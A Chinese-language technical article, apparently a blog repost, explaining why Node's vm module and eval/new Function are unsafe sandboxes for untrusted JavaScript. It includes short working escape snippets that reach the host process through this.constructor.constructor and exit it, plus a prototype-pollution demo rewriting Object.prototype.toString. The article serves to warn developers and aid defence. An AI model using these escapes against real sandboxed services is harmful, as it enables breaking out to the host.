在某些特别的场景下，我们需要编译执行外部输入的JS代码。在浏览器端，我们可以借助new Function 、eval等api。而在 node 端，我们可以借助vm模块实现一个沙箱，运行外部输入的JS 代码。但无论是浏览器端，还是node端，这些操作都有安全隐患。

外部输入的JS代码可以利用JS语言的特性，从而破坏主程序的环境。目前，笔者了解到主要有两种方式攻击主程序

方式一：通过 new Function 、 eval 在创建时，能获取到全局变量的特性，对主程序的环境进行破坏。

以 vm 实现沙箱加载外部代码为例：

const vm = require('vm');
const script = new vm.Script(`
    var foo = (new Function('return process'))();
    foo.exit()
`)
const context = vm.createContext({
    Function: Function
})
script.runInContext(context) // 此处直接退出进程，下面的代码都不会执行
console.log("process is exited ?")

此段代码中，通过外部的Function构造器, 使得生成的函数能够访问到外部的上下文，拿到process对象，直接把进程退出了。

实际上，我们不传递Function给沙箱的话，沙箱内部的代码同样可以通过JS的原型链的机制，拿到外部的Function构造器：

const vm = require('vm');
const script = new vm.Script(`
    var foo = (new this.constructor.constructor('return process'))();
    foo.exit()
`)
const context = vm.createContext()  // 此处不把外部的Function传递进去
script.runInContext(context) // 此处直接退出进程，下面的代码都不会执行
console.log("process is exited ?")

上面的沙箱里面的代码，可以通过访问沙箱内部的上下文this的contructor属性拿到外部的Object构造器，再通过Object的contructor属性直接拿到外部的Function构造器。

方式二：通过原型链方法劫持、污染

同样以 vm 实现沙箱加载外部代码为例：

const vm = require('vm');
const script = new vm.Script(`
this.constructor.prototype.toString = function() {
    console.log("hehe")
}
`)
const context = vm.createContext({
    console: console
})
script.runInContext(context)
let a = { name: 1 }
console.log(a, a.toString())

内部沙箱代码通过获取外部的Object构造器，改写原型上的toString方法，达到原型链方法破坏的目的。

总结

由于JS某些神奇的语言特性，直接编译执行外部输入的JS代码，是一件很危险的操作。说到底，想要解决某些问题，必须先了解根源。

链接: https://fly63.com/article/detial/4556